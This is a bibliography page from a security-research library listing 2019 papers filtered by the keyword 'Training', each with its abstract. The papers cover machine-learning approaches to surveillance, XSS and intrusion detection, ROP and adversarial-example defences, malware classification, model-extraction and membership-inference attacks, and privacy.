Biblio

Found 773 results

Filters: Keyword is Training  [Clear All Filters]
2020-04-13
Kim, Dongchil, Kim, Kyoungman, Park, Sungjoo.  2019.  Automatic PTZ Camera Control Based on Deep-Q Network in Video Surveillance System. 2019 International Conference on Electronics, Information, and Communication (ICEIC). :1–3.
Recently, Pan/Tilt/Zoom (PTZ) camera has been widely used in video surveillance systems. However, it is difficult to automatically control PTZ cameras according to moving objects in the surveillance area. This paper proposes an automatic camera control method based on a Deep-Q Network (DQN) for improving the recognition accuracy of anomaly actions in the video surveillance system. To generate PTZ camera control values, the proposed method uses the position and size information of the object which received from the video analysis system. Through implementation results, the proposed method can automatically control the PTZ camera according to moving objects.
2020-09-28
Akaishi, Sota, Uda, Ryuya.  2019.  Classification of XSS Attacks by Machine Learning with Frequency of Appearance and Co-occurrence. 2019 53rd Annual Conference on Information Sciences and Systems (CISS). :1–6.
Cross site scripting (XSS) attack is one of the attacks on the web. It brings session hijack with HTTP cookies, information collection with fake HTML input form and phishing with dummy sites. As a countermeasure of XSS attack, machine learning has attracted a lot of attention. There are existing researches in which SVM, Random Forest and SCW are used for the detection of the attack. However, in the researches, there are problems that the size of data set is too small or unbalanced, and that preprocessing method for vectorization of strings causes misclassification. The highest accuracy of the classification was 98% in existing researches. Therefore, in this paper, we improved the preprocessing method for vectorization by using word2vec to find the frequency of appearance and co-occurrence of the words in XSS attack scripts. Moreover, we also used a large data set to decrease the deviation of the data. Furthermore, we evaluated the classification results with two procedures. One is an inappropriate procedure which some researchers tend to select by mistake. The other is an appropriate procedure which can be applied to an attack detection filter in the real environment.
2020-11-02
Zhong, J., Yang, C..  2019.  A Compositionality Assembled Model for Learning and Recognizing Emotion from Bodily Expression. 2019 IEEE 4th International Conference on Advanced Robotics and Mechatronics (ICARM). :821–826.
When we are express our internal status, such as emotions, the human body expression we use follows the compositionality principle. It is a theory in linguistic which proposes that the single components of the bodily presentation as well as the rules used to combine them are the major parts to finish this process. In this paper, such principle is applied to the process of expressing and recognizing emotional states through body expression, in which certain key features can be learned to represent certain primitives of the internal emotional state in the form of basic variables. This is done by a hierarchical recurrent neural learning framework (RNN) because of its nonlinear dynamic bifurcation, so that variables can be learned to represent different hierarchies. In addition, we applied some adaptive learning techniques in machine learning for the requirement of real-time emotion recognition, in which a stable representation can be maintained compared to previous work. The model is examined by comparing the PB values between the training and recognition phases. This hierarchical model shows the rationality of the compositionality hypothesis by the RNN learning and explains how key features can be used and combined in bodily expression to show the emotional state.
2020-03-23
Xu, Yilin, Ge, Weimin, Li, Xiaohong, Feng, Zhiyong, Xie, Xiaofei, Bai, Yude.  2019.  A Co-Occurrence Recommendation Model of Software Security Requirement. 2019 International Symposium on Theoretical Aspects of Software Engineering (TASE). :41–48.
To guarantee the quality of software, specifying security requirements (SRs) is essential for developing systems, especially for security-critical software systems. However, using security threat to determine detailed SR is quite difficult according to Common Criteria (CC), which is too confusing and technical for non-security specialists. In this paper, we propose a Co-occurrence Recommend Model (CoRM) to automatically recommend software SRs. In this model, the security threats of product are extracted from security target documents of software, in which the related security requirements are tagged. In order to establish relationships between software security threat and security requirement, semantic similarities between different security threat is calculated by Skip-thoughts Model. To evaluate our CoRM model, over 1000 security target documents of 9 types software products are exploited. The results suggest that building a CoRM model via semantic similarity is feasible and reliable.
2021-01-15
Yadav, D., Salmani, S..  2019.  Deepfake: A Survey on Facial Forgery Technique Using Generative Adversarial Network. 2019 International Conference on Intelligent Computing and Control Systems (ICCS). :852—857.
"Deepfake" it is an incipiently emerging face video forgery technique predicated on AI technology which is used for creating the fake video. It takes images and video as source and it coalesces these to make a new video using the generative adversarial network and the output is very convincing. This technique is utilized for generating the unauthentic spurious video and it is capable of making it possible to generate an unauthentic spurious video of authentic people verbally expressing and doing things that they never did by swapping the face of the person in the video. Deepfake can create disputes in countries by influencing their election process by defaming the character of the politician. This technique is now being used for character defamation of celebrities and high-profile politician just by swapping the face with someone else. If it is utilized in unethical ways, this could lead to a serious problem. Someone can use this technique for taking revenge from the person by swapping face in video and then posting it to a social media platform. In this paper, working of Deepfake technique along with how it can swap faces with maximum precision in the video has been presented. Further explained are the different ways through which we can identify if the video is generated by Deepfake and its advantages and drawback have been listed.
2020-03-23
Qin, Peng, Tan, Cheng, Zhao, Lei, Cheng, Yueqiang.  2019.  Defending against ROP Attacks with Nearly Zero Overhead. 2019 IEEE Global Communications Conference (GLOBECOM). :1–6.
Return-Oriented Programming (ROP) is a sophisticated exploitation technique that is able to drive target applications to perform arbitrary unintended operations by constructing a gadget chain reusing existing small code sequences (gadgets) collected across the entire code space. In this paper, we propose to address ROP attacks from a different angle-shrinking available code space at runtime. We present ROPStarvation , a generic and transparent ROP countermeasure that defend against all types of ROP attacks with almost zero run-time overhead. ROPStarvation does not aim to completely stop ROP attacks, instead it attempts to significantly increase the bar by decreasing the possibility of launching a successful ROP exploit in reality. Moreover, shrinking available code space at runtime is lightweight that makes ROPStarvation practical for being deployed with high performance requirement. Results show that ROPStarvation successfully reduces the code space of target applications by 85%. With the reduced code segments, ROPStarvation decreases the probability of building a valid ROP gadget chain by 100% and 83% respectively, with the assumptions that whether the adversary knows the vulnerable applications are protected by ROPStarvation . Evaluations on the SPEC CPU2006 benchmark show that ROPStarvation introduces nearly zero (0.2% on average) run-time performance overhead.
2020-09-21
Chow, Ka-Ho, Wei, Wenqi, Wu, Yanzhao, Liu, Ling.  2019.  Denoising and Verification Cross-Layer Ensemble Against Black-box Adversarial Attacks. 2019 IEEE International Conference on Big Data (Big Data). :1282–1291.
Deep neural networks (DNNs) have demonstrated impressive performance on many challenging machine learning tasks. However, DNNs are vulnerable to adversarial inputs generated by adding maliciously crafted perturbations to the benign inputs. As a growing number of attacks have been reported to generate adversarial inputs of varying sophistication, the defense-attack arms race has been accelerated. In this paper, we present MODEF, a cross-layer model diversity ensemble framework. MODEF intelligently combines unsupervised model denoising ensemble with supervised model verification ensemble by quantifying model diversity, aiming to boost the robustness of the target model against adversarial examples. Evaluated using eleven representative attacks on popular benchmark datasets, we show that MODEF achieves remarkable defense success rates, compared with existing defense methods, and provides a superior capability of repairing adversarial inputs and making correct predictions with high accuracy in the presence of black-box attacks.
2020-01-13
Zegzhda, Dmitry, Lavrova, Daria, Khushkeev, Aleksei.  2019.  Detection of information security breaches in distributed control systems based on values prediction of multidimensional time series. 2019 IEEE International Conference on Industrial Cyber Physical Systems (ICPS). :780–784.
Proposed an approach for information security breaches detection in distributed control systems based on prediction of multidimensional time series formed of sensor and actuator data.
2020-04-03
Sattar, Naw Safrin, Arifuzzaman, Shaikh, Zibran, Minhaz F., Sakib, Md Mohiuddin.  2019.  An Ensemble Approach for Suspicious Traffic Detection from High Recall Network Alerts. {2019 IEEE International Conference on Big Data (Big Data. :4299—4308}}@inproceedings{wu_ensemble_2019.
Web services from large-scale systems are prevalent all over the world. However, these systems are naturally vulnerable and incline to be intruded by adversaries for illegal benefits. To detect anomalous events, previous works focus on inspecting raw system logs by identifying the outliers in workflows or relying on machine learning methods. Though those works successfully identify the anomalies, their models use large training set and process whole system logs. To reduce the quantity of logs that need to be processed, high recall suspicious network alert systems can be applied to preprocess system logs. Only the logs that trigger alerts are retrieved for further usage. Due to the universally usage of network traffic alerts among Security Operations Center, anomalies detection problems could be transformed to classify truly suspicious network traffic alerts from false alerts.In this work, we propose an ensemble model to distinguish truly suspicious alerts from false alerts. Our model consists of two sub-models with different feature extraction strategies to ensure the diversity and generalization. We use decision tree based boosters and deep neural networks to build ensemble models for classification. Finally, we evaluate our approach on suspicious network alerts dataset provided by 2019 IEEE BigData Cup: Suspicious Network Event Recognition. Under the metric of AUC scores, our model achieves 0.9068 on the whole testing set.
2020-11-02
Pan, C., Huang, J., Gong, J., Yuan, X..  2019.  Few-Shot Transfer Learning for Text Classification With Lightweight Word Embedding Based Models. IEEE Access. 7:53296–53304.
Many deep learning architectures have been employed to model the semantic compositionality for text sequences, requiring a huge amount of supervised data for parameters training, making it unfeasible in situations where numerous annotated samples are not available or even do not exist. Different from data-hungry deep models, lightweight word embedding-based models could represent text sequences in a plug-and-play way due to their parameter-free property. In this paper, a modified hierarchical pooling strategy over pre-trained word embeddings is proposed for text classification in a few-shot transfer learning way. The model leverages and transfers knowledge obtained from some source domains to recognize and classify the unseen text sequences with just a handful of support examples in the target problem domain. The extensive experiments on five datasets including both English and Chinese text demonstrate that the simple word embedding-based models (SWEMs) with parameter-free pooling operations are able to abstract and represent the semantic text. The proposed modified hierarchical pooling method exhibits significant classification performance in the few-shot transfer learning tasks compared with other alternative methods.
2020-02-10
Hu, Taifeng, Wu, Liji, Zhang, Xiangmin, Yin, Yanzhao, Yang, Yijun.  2019.  Hardware Trojan Detection Combine with Machine Learning: an SVM-based Detection Approach. 2019 IEEE 13th International Conference on Anti-counterfeiting, Security, and Identification (ASID). :202–206.
With the application of integrated circuits (ICs) appears in all aspects of life, whether an IC is security and reliable has caused increasing worry which is of significant necessity. An attacker can achieve the malicious purpose by adding or removing some modules, so called hardware Trojans (HTs). In this paper, we use side-channel analysis (SCA) and support vector machine (SVM) classifier to determine whether there is a Trojan in the circuit. We use SAKURA-G circuit board with Xilinx SPARTAN-6 to complete our experiment. Results show that the Trojan detection rate is up to 93% and the classification accuracy is up to 91.8475%.
2022-06-06
Feng, Ri-Chen, Lin, Daw-Tung, Chen, Ken-Min, Lin, Yi-Yao, Liu, Chin-De.  2019.  Improving Deep Learning by Incorporating Semi-automatic Moving Object Annotation and Filtering for Vision-based Vehicle Detection. 2019 IEEE International Conference on Systems, Man and Cybernetics (SMC). :2484–2489.
Deep learning has undergone tremendous advancements in computer vision studies. The training of deep learning neural networks depends on a considerable amount of ground truth datasets. However, labeling ground truth data is a labor-intensive task, particularly for large-volume video analytics applications such as video surveillance and vehicles detection for autonomous driving. This paper presents a rapid and accurate method for associative searching in big image data obtained from security monitoring systems. We developed a semi-automatic moving object annotation method for improving deep learning models. The proposed method comprises three stages, namely automatic foreground object extraction, object annotation in subsequent video frames, and dataset construction using human-in-the-loop quick selection. Furthermore, the proposed method expedites dataset collection and ground truth annotation processes. In contrast to data augmentation and data generative models, the proposed method produces a large amount of real data, which may facilitate training results and avoid adverse effects engendered by artifactual data. We applied the constructed annotation dataset to train a deep learning you-only-look-once (YOLO) model to perform vehicle detection on street intersection surveillance videos. Experimental results demonstrated that the accurate detection performance was improved from a mean average precision (mAP) of 83.99 to 88.03.
2020-06-01
Xenya, Michael Christopher, Kwayie, Crentsil, Quist-Aphesti, Kester.  2019.  Intruder Detection with Alert Using Cloud Based Convolutional Neural Network and Raspberry Pi. 2019 International Conference on Computing, Computational Modelling and Applications (ICCMA). :46–464.
In this paper, an intruder detection system has been built with an implementation of convolutional neural network (CNN) using raspberry pi, Microsoft's Azure and Twilio cloud systems. The CNN algorithm which is stored in the cloud is implemented to basically classify input data as either intruder or user. By using the raspberry pi as the middleware and raspberry pi camera for image acquisition, efficient execution of the learning and classification operations are performed using higher resources that cloud computing offers. The cloud system is also programmed to alert designated users via multimedia messaging services (MMS) when intruders or users are detected. Furthermore, our work has demonstrated that, though convolutional neural network could impose high computing demands on a processor, the input data could be obtained with low-cost modules and middleware which are of low processing power while subjecting the actual learning algorithm execution to the cloud system.
2020-01-27
Qureshi, Ayyaz-Ul-Haq, Larijani, Hadi, Javed, Abbas, Mtetwa, Nhamoinesu, Ahmad, Jawad.  2019.  Intrusion Detection Using Swarm Intelligence. 2019 UK/ China Emerging Technologies (UCET). :1–5.
Recent advances in networking and communication technologies have enabled Internet-of-Things (IoT) devices to communicate more frequently and faster. An IoT device typically transmits data over the Internet which is an insecure channel. Cyber attacks such as denial-of-service (DoS), man-in-middle, and SQL injection are considered as big threats to IoT devices. In this paper, an anomaly-based intrusion detection scheme is proposed that can protect sensitive information and detect novel cyber-attacks. The Artificial Bee Colony (ABC) algorithm is used to train the Random Neural Network (RNN) based system (RNN-ABC). The proposed scheme is trained on NSL-KDD Train+ and tested for unseen data. The experimental results suggest that swarm intelligence and RNN successfully classify novel attacks with an accuracy of 91.65%. Additionally, the performance of the proposed scheme is also compared with a hybrid multilayer perceptron (MLP) based intrusion detection system using sensitivity, mean of mean squared error (MMSE), the standard deviation of MSE (SDMSE), best mean squared error (BMSE) and worst mean squared error (WMSE) parameters. All experimental tests confirm the robustness and high accuracy of the proposed scheme.
2020-01-21
Taib, Abidah Mat, Othman, Nor Arzami, Hamid, Ros Syamsul, Halim, Iman Hazwam Abd.  2019.  A Learning Kit on IPv6 Deployment and Its Security Challenges for Neophytes. 2019 21st International Conference on Advanced Communication Technology (ICACT). :419–424.
Understanding the IP address depletion and the importance of handling security issues in IPv6 deployment can make IT personnel becomes more functional and helpful to the organization. It also applied to the management people who are responsible for approving the budget or organization policy related to network security. Unfortunately, new employees or fresh graduates may not really understand the challenge related to IPv6 deployment. In order to be equipped with appropriate knowledge and skills, these people may require a few weeks of attending workshops or training. Thus, of course involving some implementation cost as well as sacrificing allocated working hours. As an alternative to save cost and to help new IT personnel become quickly educated and familiar with IPv6 deployment issues, this paper presented a learning kit that has been designed to include self-learning features that can help neophytes to learn about IPv6 at their own pace. The kit contains some compact notes, brief security model and framework as well as a guided module with supporting quizzes to maintain a better understanding of the topics. Since IPv6 is still in the early phase of implementation in most of developing countries, this kit can be an additional assisting tool to accelerate the deployment of IPv6 environment in any organization. The kit also can be used by teachers and trainers as a supporting tool in the classroom. The pre-alpha testing has attracted some potential users and the findings proved their acceptance. The kit has prospective to be further enhanced and commercialized.
2020-01-27
Zhang, Naiji, Jaafar, Fehmi, Malik, Yasir.  2019.  Low-Rate DoS Attack Detection Using PSD Based Entropy and Machine Learning. 2019 6th IEEE International Conference on Cyber Security and Cloud Computing (CSCloud)/ 2019 5th IEEE International Conference on Edge Computing and Scalable Cloud (EdgeCom). :59–62.
The Distributed Denial of Service attack is one of the most common attacks and it is hard to mitigate, however, it has become more difficult while dealing with the Low-rate DoS (LDoS) attacks. The LDoS exploits the vulnerability of TCP congestion-control mechanism by sending malicious traffic at the low constant rate and influence the victim machine. Recently, machine learning approaches are applied to detect the complex DDoS attacks and improve the efficiency and robustness of the intrusion detection system. In this research, the algorithm is designed to balance the detection rate and its efficiency. The detection algorithm combines the Power Spectral Density (PSD) entropy function and Support Vector Machine to detect LDoS traffic from normal traffic. In our solution, the detection rate and efficiency are adjustable based on the parameter in the decision algorithm. To have high efficiency, the detection method will always detect the attacks by calculating PSD-entropy first and compare it with the two adaptive thresholds. The thresholds can efficiently filter nearly 19% of the samples with a high detection rate. To minimize the computational cost and look only for the patterns that are most relevant for detection, Support Vector Machine based machine learning model is applied to learn the traffic pattern and select appropriate features for detection algorithm. The experimental results show that the proposed approach can detect 99.19% of the LDoS attacks and has an O (n log n) time complexity in the best case.
2020-04-03
Song, Liwei, Shokri, Reza, Mittal, Prateek.  2019.  Membership Inference Attacks Against Adversarially Robust Deep Learning Models. 2019 IEEE Security and Privacy Workshops (SPW). :50—56.
In recent years, the research community has increasingly focused on understanding the security and privacy challenges posed by deep learning models. However, the security domain and the privacy domain have typically been considered separately. It is thus unclear whether the defense methods in one domain will have any unexpected impact on the other domain. In this paper, we take a step towards enhancing our understanding of deep learning models when the two domains are combined together. We do this by measuring the success of membership inference attacks against two state-of-the-art adversarial defense methods that mitigate evasion attacks: adversarial training and provable defense. On the one hand, membership inference attacks aim to infer an individual's participation in the target model's training dataset and are known to be correlated with target model's overfitting. On the other hand, adversarial defense methods aim to enhance the robustness of target models by ensuring that model predictions are unchanged for a small area around each sample in the training dataset. Intuitively, adversarial defenses may rely more on the training dataset and be more vulnerable to membership inference attacks. By performing empirical membership inference attacks on both adversarially robust models and corresponding undefended models, we find that the adversarial training method is indeed more susceptible to membership inference attacks, and the privacy leakage is directly correlated with model robustness. We also find that the provable defense approach does not lead to enhanced success of membership inference attacks. However, this is achieved by significantly sacrificing the accuracy of the model on benign data points, indicating that privacy, security, and prediction accuracy are not jointly achieved in these two approaches.
2020-10-26
Sethi, Kamalakanta, Kumar, Rahul, Sethi, Lingaraj, Bera, Padmalochan, Patra, Prashanta Kumar.  2019.  A Novel Machine Learning Based Malware Detection and Classification Framework. 2019 International Conference on Cyber Security and Protection of Digital Services (Cyber Security). :1–4.
As time progresses, new and complex malware types are being generated which causes a serious threat to computer systems. Due to this drastic increase in the number of malware samples, the signature-based malware detection techniques cannot provide accurate results. Different studies have demonstrated the proficiency of machine learning for the detection and classification of malware files. Further, the accuracy of these machine learning models can be improved by using feature selection algorithms to select the most essential features and reducing the size of the dataset which leads to lesser computations. In this paper, we have developed a machine learning based malware analysis framework for efficient and accurate malware detection and classification. We used Cuckoo sandbox for dynamic analysis which executes malware in an isolated environment and generates an analysis report based on the system activities during execution. Further, we propose a feature extraction and selection module which extracts features from the report and selects the most important features for ensuring high accuracy at minimum computation cost. Then, we employ different machine learning algorithms for accurate detection and fine-grained classification. Experimental results show that we got high detection and classification accuracy in comparison to the state-of-the-art approaches.
2020-08-24
Sarma, Subramonian Krishna.  2019.  Optimized Activation Function on Deep Belief Network for Attack Detection in IoT. 2019 Third International conference on I-SMAC (IoT in Social, Mobile, Analytics and Cloud) (I-SMAC). :702–708.
This paper mainly focuses on presenting a novel attack detection system to thread out the risk issues in IoT. The presented attack detection system links the interconnection of DevOps as it creates the correlation between development and IT operations. Further, the presented attack detection model ensures the operational security of different applications. In view of this, the implemented system incorporates two main stages named Proposed Feature Extraction process and Classification. The data from every application is processed with the initial stage of feature extraction, which concatenates the statistical and higher-order statistical features. After that, these extracted features are supplied to classification process, where determines the presence of attacks. For this classification purpose, this paper aims to deploy the optimized Deep Belief Network (DBN), where the activation function is tuned optimally. Furthermore, the optimal tuning is done by a renowned meta-heuristic algorithm called Lion Algorithm (LA). Finally, the performance of proposed work is compared and proved over other conventional methods.
2020-02-17
Ying, Huan, Ouyang, Xuan, Miao, Siwei, Cheng, Yushi.  2019.  Power Message Generation in Smart Grid via Generative Adversarial Network. 2019 IEEE 3rd Information Technology, Networking, Electronic and Automation Control Conference (ITNEC). :790–793.
As the next generation of the power system, smart grid develops towards automated and intellectualized. Along with the benefits brought by smart grids, e.g., improved energy conversion rate, power utilization rate, and power supply quality, are the security challenges. One of the most important issues in smart grids is to ensure reliable communication between the secondary equipment. The state-of-art method to ensure smart grid security is to detect cyber attacks by deep learning. However, due to the small number of negative samples, the performance of the detection system is limited. In this paper, we propose a novel approach that utilizes the Generative Adversarial Network (GAN) to generate abundant negative samples, which helps to improve the performance of the state-of-art detection system. The evaluation results demonstrate that the proposed method can effectively improve the performance of the detection system by 4%.
2020-08-03
Juuti, Mika, Szyller, Sebastian, Marchal, Samuel, Asokan, N..  2019.  PRADA: Protecting Against DNN Model Stealing Attacks. 2019 IEEE European Symposium on Security and Privacy (EuroS P). :512–527.
Machine learning (ML) applications are increasingly prevalent. Protecting the confidentiality of ML models becomes paramount for two reasons: (a) a model can be a business advantage to its owner, and (b) an adversary may use a stolen model to find transferable adversarial examples that can evade classification by the original model. Access to the model can be restricted to be only via well-defined prediction APIs. Nevertheless, prediction APIs still provide enough information to allow an adversary to mount model extraction attacks by sending repeated queries via the prediction API. In this paper, we describe new model extraction attacks using novel approaches for generating synthetic queries, and optimizing training hyperparameters. Our attacks outperform state-of-the-art model extraction in terms of transferability of both targeted and non-targeted adversarial examples (up to +29-44 percentage points, pp), and prediction accuracy (up to +46 pp) on two datasets. We provide take-aways on how to perform effective model extraction attacks. We then propose PRADA, the first step towards generic and effective detection of DNN model extraction attacks. It analyzes the distribution of consecutive API queries and raises an alarm when this distribution deviates from benign behavior. We show that PRADA can detect all prior model extraction attacks with no false positives.
2020-08-24
Jeon, Joohyung, Kim, Junhui, Kim, Joongheon, Kim, Kwangsoo, Mohaisen, Aziz, Kim, Jong-Kook.  2019.  Privacy-Preserving Deep Learning Computation for Geo-Distributed Medical Big-Data Platforms. 2019 49th Annual IEEE/IFIP International Conference on Dependable Systems and Networks – Supplemental Volume (DSN-S). :3–4.
This paper proposes a distributed deep learning framework for privacy-preserving medical data training. In order to avoid patients' data leakage in medical platforms, the hidden layers in the deep learning framework are separated and where the first layer is kept in platform and others layers are kept in a centralized server. Whereas keeping the original patients' data in local platforms maintain their privacy, utilizing the server for subsequent layers improves learning performance by using all data from each platform during training.
2019-12-30
Liu, Keng-Cheng, Hsu, Chen-Chien, Wang, Wei-Yen, Chiang, Hsin-Han.  2019.  Real-Time Facial Expression Recognition Based on CNN. 2019 International Conference on System Science and Engineering (ICSSE). :120–123.
In this paper, we propose a method for improving the robustness of real-time facial expression recognition. Although there are many ways to improve the accuracy of facial expression recognition, a revamp of the training framework and image preprocessing allow better results in applications. One existing problem is that when the camera is capturing images in high speed, changes in image characteristics may occur at certain moments due to the influence of light and other factors. Such changes can result in incorrect recognition of the human facial expression. To solve this problem for smooth system operation and maintenance of recognition speed, we take changes in image characteristics at high speed capturing into account. The proposed method does not use the immediate output for reference, but refers to the previous image for averaging to facilitate recognition. In this way, we are able to reduce interference by the characteristics of the images. The experimental results show that after adopting this method, overall robustness and accuracy of facial expression recognition have been greatly improved compared to those obtained by only the convolution neural network (CNN).
2020-03-09
Cao, Yuan, Zhao, Yongli, Li, Jun, Lin, Rui, Zhang, Jie, Chen, Jiajia.  2019.  Reinforcement Learning Based Multi-Tenant Secret-Key Assignment for Quantum Key Distribution Networks. 2019 Optical Fiber Communications Conference and Exhibition (OFC). :1–3.
We propose a reinforcement learning based online multi-tenant secret-key assignment algorithm for quantum key distribution networks, capable of reducing tenant-request blocking probability more than half compared to the benchmark heuristics.
2020-09-28
Oya, Simon, Troncoso, Carmela, Pèrez-Gonzàlez, Fernando.  2019.  Rethinking Location Privacy for Unknown Mobility Behaviors. 2019 IEEE European Symposium on Security and Privacy (EuroS P). :416–431.
Location Privacy-Preserving Mechanisms (LPPMs) in the literature largely consider that users' data available for training wholly characterizes their mobility patterns. Thus, they hardwire this information in their designs and evaluate their privacy properties with these same data. In this paper, we aim to understand the impact of this decision on the level of privacy these LPPMs may offer in real life when the users' mobility data may be different from the data used in the design phase. Our results show that, in many cases, training data does not capture users' behavior accurately and, thus, the level of privacy provided by the LPPM is often overestimated. To address this gap between theory and practice, we propose to use blank-slate models for LPPM design. Contrary to the hardwired approach, that assumes known users' behavior, blank-slate models learn the users' behavior from the queries to the service provider. We leverage this blank-slate approach to develop a new family of LPPMs, that we call Profile Estimation-Based LPPMs. Using real data, we empirically show that our proposal outperforms optimal state-of-the-art mechanisms designed on sporadic hardwired models. On non-sporadic location privacy scenarios, our method is only better if the usage of the location privacy service is not continuous. It is our hope that eliminating the need to bootstrap the mechanisms with training data and ensuring that the mechanisms are lightweight and easy to compute help fostering the integration of location privacy protections in deployed systems.